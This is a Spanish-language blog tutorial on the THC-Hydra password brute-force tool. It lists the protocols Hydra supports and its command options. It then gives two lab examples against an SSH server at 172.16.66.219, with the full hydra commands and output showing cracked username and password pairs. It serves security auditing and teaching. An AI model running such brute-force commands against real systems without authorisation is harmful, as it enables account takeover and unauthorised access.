THC-Hydra es un práctico Software con licencia GPLv3, que permite realizar auditoria por medio de fuerza bruta a las cuentas de usuarios y contraseñas de los diferentes servicios que se estén implementando en un sistema de información.
Existe otro tipo de software con funcionalidad parecida, pero, de THC-Hydra podemos destacar las siguiente características:
- Licencia que permite el uso y descarga con total libertad.
- Soporte a gran cantidad de protocolos ( detalles en Currently this tool supports)
- Flexible en cuanto al uso, y rápido al auditar los sistemas de información.
- Multiplataforma (Windows, Linux, Solaris, FreeBSD, etc)
Actualmente se está implementando de forma estable la versión 7.1. En BackTrack 5 R1, se encuentra la versión 6.5 instalada y funcional.
Currently this tool supports: AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Tomado de http://www.thc.org/thc-hydra/
Opciones para uso de la versión 6.5 implementada en BackTrack 5 R1
Options: -R restore a previous aborted/crashed session -S connect via SSL -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help -e ns additional checks, "n" for null password, "s" try login as pass -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE server list for parallel attacks, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f exit after the first found login/password pair (per host if -M) -t TASKS run TASKS number of connects in parallel (default: 16) -W TIME defines the wait time between connects for one thread in seconds -w TIME defines the max wait time in seconds for responses (default: 20) -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V verbose mode / show login+pass combination for each attempt -U service module usage details Tomado de las ayudas del software que se imprimen por el terminal
THC-Hydra en la Práctica.
Ejemplo 1.
Práctica realizada desde una distribución BackTrack 5 R1 y con la versión 6.5 de THC-Hydra.
En el siguiente ejemplo atacaremos por fuerza bruta y éticamente con THC-Hydra al servicio SSH instalado en un servidor con IP 172.16.66.219 instalado para estos fines.
En el terminal se escribe el siguiente código:
# hydra -l david -P acronym 172.16.66.219 ssh -s 22 -w 99999999
Donde:
-l hace referencia al nombre de la cuenta del usuario que utiliza el servicio SSH, en el ejemplo es: david.
-P Hace referencia al archivo (diccionario) donde estará el listado de las posibles contraseñas a adivinar, en el ejemplo es: acronym.
ssh Se refiere al servicio que será auditado y se encuentra activo.
-s Hace referencia al puerto del servicio a auditar, en el ejemplo es el 22 correspondiente al servicio SSH.
-w Esta propiedad es muy importante, y hace referencia al tiempo que tomará la auditoría.
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 12:45:56 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se.. [DATA] 16 tasks, 1 servers, 19195 login tries (l:1/p:19195), ~1199 tries per task [DATA] attacking service ssh on port 22 [STATUS] 152.00 tries/min, 152 tries in 00:01h, 19043 todo in 02:06h [22][ssh] host: 172.16.66.219 login: david password: ADDICT-L [STATUS] attack finished for 172.16.66.219 (waiting for children to finish) Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 12:48:53
Finalmente el THC-Hydra arroja los resultados, se puede constatar que la contraseña ha sido adivinada, ya que se encontraba dentro del diccionario utilizado como prueba.
Ejemplo 2.
En este ejemplo buscamos a todos los de usuarios que tienen como contraseña 123456 en el servidor SSH y además se encuentre dentro del diccionario llamado dic.
#hydra -L dic -p 123456 172.16.66.219 ssh -s 22 -w 99999 Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2012-01-22 21:53:18 WARNING: Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 se.. [DATA] 16 tasks, 1 servers, 133 login tries (l:133/p:1), ~8 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: 172.16.66.219 login: laura password: 123456 [STATUS] 74.00 tries/min, 74 tries in 00:01h, 59 todo in 00:01h [STATUS] 46.00 tries/min, 92 tries in 00:02h, 41 todo in 00:01h [22][ssh] host: 172.16.66.219 login: carlos password: 123456 [STATUS] attack finished for 172.16.66.219 (waiting for children to finish) Hydra (http://www.thc.org/thc-hydra) finished at 2012-01-22 21:56:27
Vemos los únicos 2 nombres de usuarios que cumplen con la contraseña 123456.
Hasta una próxima.
by Mauroxan